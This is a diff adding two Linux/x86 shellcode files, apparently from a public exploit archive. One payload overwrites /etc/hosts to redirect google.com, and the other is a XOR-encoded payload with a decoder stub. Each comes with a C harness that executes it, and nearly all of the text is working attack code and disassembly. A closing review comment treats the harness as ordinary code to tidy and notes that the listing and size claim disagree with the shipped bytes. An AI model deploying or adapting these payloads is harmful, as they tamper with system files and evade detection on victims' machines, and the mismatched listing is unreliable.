+ 80480a4: cd 80 int 0x80
+
+080480a6 :
+ 80480a6: 31 c0 xor eax,eax
+ 80480a8: 40 inc eax
+ 80480a9: cd 80 int 0x80
+****************************************************/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80";
+
+main()
+{
+ printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/45418.c b/shellcodes/linux_x86/45418.c
new file mode 100644
index 000000000..694d60a49
--- /dev/null
+++ b/shellcodes/linux_x86/45418.c
@@ -0,0 +1,127 @@
+/*
+# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
+# Date: 2018-09-13
+# Author: Ray Doyle (@doylersec)
+# Homepage: https://www.doyler.net
+# Tested on: Linux/x86
+# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
+*/
+
+/****************************************************
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: eb 2f jmp 8048091
+
+08048062 :
+ 8048062: 5f pop edi
+ 8048063: 57 push edi
+ 8048064: 5e pop esi
+
+08048065 :
+ 8048065: 8a 07 mov al,BYTE PTR [edi]
+ 8048067: 6a 90 push 0xffffff90
+ 8048069: 5b pop ebx
+ 804806a: 3c aa cmp al,0xaa
+ 804806c: 74 0a je 8048078
+ 804806e: 30 d8 xor al,bl
+
+08048070 :
+ 8048070: 30 07 xor BYTE PTR [edi],al
+ 8048072: 47 inc edi
+ 8048073: 30 07 xor BYTE PTR [edi],al
+ 8048075: 47 inc edi
+ 8048076: eb ed jmp 8048065
+
+08048078 :
+ 8048078: 8d 3e lea edi,[esi]
+ 804807a: 31 c0 xor eax,eax
+ 804807c: 31 db xor ebx,ebx
+
+0804807e :
+ 804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
+ 8048081: 80 f3 90 xor bl,0x90
+ 8048084: 75 10 jne 8048096
+ 8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
+ 804808a: 88 1f mov BYTE PTR [edi],bl
+ 804808c: 47 inc edi
+ 804808d: 04 02 add al,0x2
+ 804808f: eb ed jmp 804807e
+
+08048091 :
+ 8048091: e8 cc ff ff ff call 8048062
+
+08048096 :
+ 8048096: b7 cc mov bh,0xcc
+ 8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
+ 804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
+ 80480a2: 75 d4 jne 8048078
+ 80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
+ 80480a9: 8d (bad)
+ 80480aa: d5 1c aad 0x1c
+ 80480ac: f7 56 73 not DWORD PTR [esi+0x73]
+ 80480af: 31 ef xor edi,ebp
+ 80480b1: cd a9 int 0xa9
+ 80480b3: 34 12 xor al,0x12
+ 80480b5: 4f dec edi
+ 80480b6: 50 push eax
+ 80480b7: 40 inc eax
+ 80480b8: 71 d0 jno 804808a
+ 80480ba: 94 xchg esp,eax
+ 80480bb: c4 (bad)
+ 80480bc: f7 d7 not edi
+ 80480be: 7f ee jg 80480ae
+ 80480c0: 62 (bad)
+ 80480c1: c3 ret
+ 80480c2: 48 dec eax
+ 80480c3: 03 d3 add edx,ebx
+ 80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
+ 80480c8: 2c 54 sub al,0x54
+ 80480ca: 0c 78 or al,0x78
+ 80480cc: 05 6a 37 58 e4 add eax,0xe458376a
+ 80480d1: 8b dc mov ebx,esp
+ 80480d3: 04 3b add al,0x3b
+ 80480d5: ce into
+ 80480d6: b6 4a mov dh,0x4a
+ 80480d8: af scas eax,DWORD PTR es:[edi]
+ 80480d9: 53 push ebx
+ 80480da: 59 pop ecx
+ 80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
+ 80480dc: b5 05 mov ch,0x5
+ 80480de: f7 30 div DWORD PTR [eax]
+ 80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
+ 80480e5: 60 pusha
+ 80480e6: e4 10 in al,0x10
+ 80480e8: 7d cc jge 80480b6
+ 80480ea: 56 push esi
+ 80480eb: cc int3
+ 80480ec: aa stos BYTE PTR es:[edi],al
+****************************************************/
+
+#include
+#include
+#include
+
+unsigned char stub[] = \
+"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
+
+unsigned char shellcode[] = \
+"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
+
+unsigned char* code;
+
+main()
+{
+ printf("\nStub Length: %d\n", strlen(stub));
+ printf("Shellcode Length: %d\n\n", strlen(shellcode));
+
+ printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));
+
+ code = malloc(strlen(stub) + strlen(shellcode));
+ memcpy(code, stub, strlen(stub));
+ memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+}
\ No newline at end of file
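Review bot: `code = malloc(strlen(stub) + strlen(shellcode));` is followed by two `memcpy` calls without checking the result, so an allocation failure becomes a write through NULL (CERT MEM32-C); add `if (code == NULL) { perror("malloc"); return 1; }` right after it, and compute the combined length once into a `size_t` instead of repeating `strlen` nine times across the printf, malloc and memcpy lines. The disassembly comment also disagrees with the bytes it documents: the listing is a 54-byte stub (`eb 2f`, `75 10`, `call` at 8048091), matching the "(54 bytes)" in the title, whereas `stub[]` holds 56 bytes with `\xeb\x31`, `\x75\x12` and an extra `\xff\xe6` ahead of the final `\xe8\xca\xff\xff\xff`, so the listing and title appear to describe an earlier build and should be regenerated from the bytes actually shipped. `unsigned char* code;` is file-scope but used only inside `main`; a local `unsigned char *code` keeps its ownership obvious.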